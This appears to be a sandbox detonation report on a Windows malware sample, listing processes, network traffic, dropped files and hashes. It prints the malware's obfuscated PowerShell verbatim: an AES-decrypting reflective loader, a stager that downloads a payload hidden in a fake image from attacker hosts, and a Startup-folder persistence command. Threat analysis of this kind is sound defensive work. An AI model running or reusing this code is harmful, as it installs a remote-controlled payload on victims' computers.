C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd';$MZYP='MadRzGindRzGModdRzGuldRzGedRzG'.Replace('dRzG', ''),'ChQdTpaQdTpngQdTpeEQdTpxteQdTpnsiQdTponQdTp'.Replace('QdTp', ''),'FGJZSroGJZSmBGJZSasGJZSeGJZS6GJZS4GJZSStrGJZSinGJZSgGJZS'.Replace('GJZS', ''),'GfsYwetfsYwCfsYwurfsYwrfsYwentfsYwProfsYwcefsYwssfsYw'.Replace('fsYw', ''),'ElPbFUePbFUmPbFUenPbFUtPbFUAtPbFU'.Replace('PbFU', ''),'InvEnKDoEnKDkeEnKD'.Replace('EnKD', ''),'Decnyejomnyejprnyejenyejssnyej'.Replace('nyej', ''),'LoaCsUjdCsUj'.Replace('CsUj', ''),'SXMnypliXMnytXMny'.Replace('XMny', ''),'ReYChsadYChsLinYChsesYChs'.Replace('YChs', ''),'TraTpWrnsTpWrfoTpWrrmTpWrFinTpWralTpWrBlTpWrockTpWr'.Replace('TpWr', ''),'CrjagKeajagKtjagKeDejagKcrjagKyjagKpjagKtorjagK'.Replace('jagK', ''),'EqqjYnqqjYtryqqjYPoiqqjYntqqjY'.Replace('qqjY', ''),'CCMrToCMrTpCMrTyToCMrT'.Replace('CMrT', '');powershell -w hidden;function lezXx($vAHtD){$fMpHn=[System.Security.Cryptography.Aes]::Create();$fMpHn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fMpHn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fMpHn.Key=[System.Convert]::($MZYP[2])('Vz0NaMXoskkNfAZDSYL9QEs4+Pg8xizh89PafV/0IEc=');$fMpHn.IV=[System.Convert]::($MZYP[2])('YYQFWZml9Xmr8vgNBAedtQ==');$LBVjX=$fMpHn.($MZYP[11])();$OrsvL=$LBVjX.($MZYP[10])($vAHtD,0,$vAHtD.Length);$LBVjX.Dispose();$fMpHn.Dispose();$OrsvL;}function UqmQx($vAHtD){$YXBBI=New-Object System.IO.MemoryStream(,$vAHtD);$DXQeR=New-Object System.IO.MemoryStream;$GSEpw=New-Object System.IO.Compression.GZipStream($YXBBI,[IO.Compression.CompressionMode]::($MZYP[6]));$GSEpw.($MZYP[13])($DXQeR);$GSEpw.Dispose();$YXBBI.Dispose();$DXQeR.Dispose();$DXQeR.ToArray();}$GbEwM=[System.IO.File]::($MZYP[9])([Console]::Title);$PQord=UqmQx (lezXx ([Convert]::($MZYP[2])([System.Linq.Enumerable]::($MZYP[4])($GbEwM, 5).Substring(2))));$GigRn=UqmQx (lezXx ([Convert]::($MZYP[2])([System.Linq.Enumerable]::($MZYP[4])($GbEwM, 6).Substring(2))));[System.Reflection.Assembly]::($MZYP[7])([byte[]]$GigRn).($MZYP[12]).($MZYP[5])($null,$null);[System.Reflection.Assembly]::($MZYP[7])([byte[]]$PQord).($MZYP[12]).($MZYP[5])($null,$null); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1400 --field-trial-handle=2256,i,6670388345726423024,18382795228658886258,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 vbdsg.duckdns.org udp
GB 57.128.155.22:8896 vbdsg.duckdns.org tcp
US 8.8.8.8:53 22.155.128.57.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.178.10:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qq2ufdci.hzq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3132-9-0x0000019A34E90000-0x0000019A34EB2000-memory.dmp

memory/3132-10-0x00007FF97B670000-0x00007FF97C131000-memory.dmp

memory/3132-12-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp

memory/3132-11-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp

memory/3132-13-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp

memory/3132-14-0x0000019A352A0000-0x0000019A352E4000-memory.dmp

memory/3132-15-0x0000019A35370000-0x0000019A353E6000-memory.dmp

memory/2184-22-0x00007FF97B670000-0x00007FF97C131000-memory.dmp

memory/2184-23-0x00000228689B0000-0x00000228689C0000-memory.dmp

memory/2184-27-0x00000228689B0000-0x00000228689C0000-memory.dmp

memory/3132-28-0x00007FF97B670000-0x00007FF97C131000-memory.dmp

memory/2184-31-0x00007FF97B670000-0x00007FF97C131000-memory.dmp

memory/3132-33-0x0000019A35250000-0x0000019A35264000-memory.dmp

memory/3132-34-0x00007FF99AA90000-0x00007FF99AC85000-memory.dmp

memory/3132-35-0x00007FF999B20000-0x00007FF999BDE000-memory.dmp

memory/3132-36-0x0000019A35260000-0x0000019A3526C000-memory.dmp

memory/3132-37-0x0000019A35270000-0x0000019A35280000-memory.dmp

memory/3132-38-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp

memory/3132-39-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp

memory/3132-40-0x0000019A1A9B0000-0x0000019A1A9C0000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240412-en

Max time kernel

134s

Max time network

137s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Music.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Music.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTregDgTreD0DgTreIDgTreBODgTreGUDgTredwDgTretDgTreE8DgTreYgBqDgTreGUDgTreYwB0DgTreCDgTreDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBODgTreGUDgTredDgTreDgTreuDgTreFcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTrePQDgTregDgTreEcDgTreZQB0DgTreC0DgTreUgBhDgTreG4DgTreZDgTreBvDgTreG0DgTreIDgTreDgTretDgTreEkDgTrebgBwDgTreHUDgTredDgTreBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreLQBDDgTreG8DgTredQBuDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreByDgTreGUDgTredDgTreB1DgTreHIDgTrebgDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreaQBlDgTreGwDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreMgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre2DgTreDYDgTreMQDgTre1DgTreDQDgTreNwDgTreyDgTreDUDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTreZgBpDgTreGwDgTreZQBzDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNDgTreDgTre0DgTreDQDgTreMQDgTre3DgTreDIDgTreMwDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTredDgTreBlDgTreHMDgTredDgTreBwDgTreG8DgTredwBlDgTreHIDgTrecwBoDgTreGUDgTrebDgTreBsDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTrebDgTreBhDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreZDgTreBrDgTreG0DgTrebQBJDgTreGgDgTreRgDgTrevDgTreHMDgTreZQBsDgTreGkDgTreZgDgTrevDgTreG8DgTrecgBwDgTreC4DgTreZDgTreBsDgTreGUDgTreaQBoDgTreHMDgTrebwBuDgTreGEDgTrebgDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreLDgTreDgTregDgTreCcDgTreTQB1DgTreHMDgTreaQBjDgTreCcDgTreKQDgTrepDgTreH0DgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.dkmmIhF/selif/orp.dleihsonan//:sptth', '1', 'Music'))}}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Music.vbs'"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 19.40.53.23.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 nanoshd.pro udp
US 8.8.8.8:53 nanoshield.pro udp
US 172.67.203.108:443 nanoshield.pro tcp
US 8.8.8.8:53 108.203.67.172.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dcx5rz30.v4i.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4140-9-0x00000151F7600000-0x00000151F7622000-memory.dmp

memory/4140-10-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp

memory/4140-11-0x00000151DCF40000-0x00000151DCF50000-memory.dmp

memory/4140-12-0x00000151DCF40000-0x00000151DCF50000-memory.dmp

memory/3304-13-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp

memory/3304-23-0x000002C5CDD00000-0x000002C5CDD10000-memory.dmp

memory/3304-24-0x000002C5CD840000-0x000002C5CD88E000-memory.dmp

memory/4136-26-0x000001F8A1DF0000-0x000001F8A1E00000-memory.dmp

memory/4136-25-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp

memory/4136-42-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp

memory/3304-43-0x000002C5CDD00000-0x000002C5CDD10000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7c0e589f91d9ceee1b937d2bb3381dab
SHA1 1fcdf3e9a0888cf23edb5fa6b2e89ff99b9a6a93
SHA256 b6d1df24d29cf8b985fccb7bb79bcead5bd6cc068b3bc2c8701230baa59b034a
SHA512 65b299281626acfe988b11903072bda49f72003d4186b8e6b6971b1bca4a261e749b91588e139898a26eceb01a56d2a72a5fd2c8f5b78e71a9d54f9359cbe310

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

memory/3304-47-0x00007FF8421D0000-0x00007FF842C91000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 50a8221b93fbd2628ac460dd408a9fc1
SHA1 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA256 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
